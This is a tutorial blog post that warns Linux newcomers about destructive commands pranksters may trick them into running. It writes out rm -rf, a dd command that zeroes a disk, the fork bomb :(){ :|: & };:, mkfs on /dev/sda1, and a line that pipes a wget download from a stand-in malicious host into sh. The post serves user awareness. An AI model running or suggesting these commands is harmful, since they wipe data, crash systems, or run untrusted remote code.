Linux/Unix : Commands that you need to be careful about




Many people got caught up by the "startup" bugs and are learning how to develop their own web application or native apps that connect to backend server .. such as a Linux server for the first time. Along the way, some of these "newbies" will get dupe by some "seniors" just for fun or from competitor/hackers looking to sabotage you.

Just the other day, a friend got pranked by a fork bomb and I'm writing this tutorial here so that newbies learning Linux/Unix will be aware of these commands and their associated dangers. Hopefully they(newbies) won't get pranked by someone else asking them to issue these commands to kill their own server, to see some hidden easter eggs or enter their machine "super mode" one day.

1. rm -rf command

In Linux/Unix/MacOSX, the rm command means to remove and by adding -rf parameter, it will make the rm -rf to remove the target directory or files WITHOUT prompting you for permission. It just silently and elegantly remove everything in it's path if running under root or sudo environment. Be very careful of this rm command and treat it like a grenade. If in doubt, do not use it unless you have a backup of the files or directory that you want to delete.

2. Files overwritten by tar bomb

Sometime you will download the software directly from the repository into your Linux box and you happen to get gzipped tar file. After gunzipping the tar.gz file, you need to untar the tar file and as a result... the tar files happen to contain files that have similar file names with your existing file in the current directory. Thus over writing your original file.

You might want see the tar files list first by doing tar -t file.tar first before actually un-tarring... the -t option means to "List archive contents to stdout." or simply means to list the content to screen before or during un-tarring process.

A good practice is to always move the tar file into a new directory before un-tarring it. This will prevent files being overwritten during un-tarring process.

3. dd command

From the man(manual) page : dd -- convert and copy a file and you might think it is a tool to copy files.

If use correctly, yes. If not... it can be harmful and even destroy your computer primary hard disk partition.

If someone tells you to issue this command

 dd if=/dev/zero of=/dev/disk0 

or

 dd if=/dev/zero of=/dev/had (disk0 or had - depending on your system configuration)

you got be careful with that guy/gal. Never walk away from that person with your back facing him or her! This command will basically zero out your primary hard disk partition!

4. Fork bomb command

For the uninitiated, this line of command :(){ :|: & };: seems like some smileys and not harmful. However, if you run this command on your terminal or in a shell/bash script.... be prepared to restart your entire Linux machine.

Once this command is executed, it will be "fruitful and multiply" until all the system resources - CPU and memory - maxed out. The only way out is to reboot the machine and this will probably cause data loss.

It is actually a shell/bash function that called it recursively until your Linux system crash. No need root or sudo command.

Read more at https://en.wikipedia.org/wiki/Fork_bomb

5. mv directory /dev/null Command

/dev/null is null device which is also known as the Unix/Linux black hole. I use it from time to time with the cat /dev/null > somelogfiles to reset a file size from few giga bytes to zero in an instance.

One should not simply use /dev/null unless you know how dangerous a black hole can be when you get near it. One of the most common prank that get played on Linux/Unix newbie is to issue the mv directory /dev/null command. This will cause the directory content to disappear instantly. Only use it if that is what you really want to do.

5. Make filesystem mkfs command

Unless you know what you are doing, do not simply run the mkfs. The command is use for - make file system . i.e to initiate a new device or in other word - format the device. Thus everything will be gone.

For example: mkfs -t ext3 /dev/sda1 will format the /dev/sda1 with ext3 file system.

6. Download script and execute it right away

There are many "hacked" source code or popular software lying around the Internet. Placed by crackers looking for the next victim and they even include the "instruction" on how to get it installed on your Linux machine. Such as :

 sudo wget http://download-hacked-code.com/let-me-screw-your-machine-file -O file | sh

What the above command will do if it is executed on your Linux machine is to run the downloaded file straightaway. Without allowing you to scrutinize the file content before executing it. Depending on the downloaded file payload ... the level of harm can varied. Again, unless you trust the source... do not do this!

References :

https://en.wikipedia.org/wiki/Fork_bomb

http://linux.die.net/man/8/mkfs

  See also : Unix/Linux : Get reboot history or check when was the last reboot date





By Adam Ng

IF you gain some knowledge or the information here solved your programming problem. Please consider donating to the less fortunate or some charities that you like. Apart from donation, planting trees, volunteering or reducing your carbon footprint will be great too.


Advertisement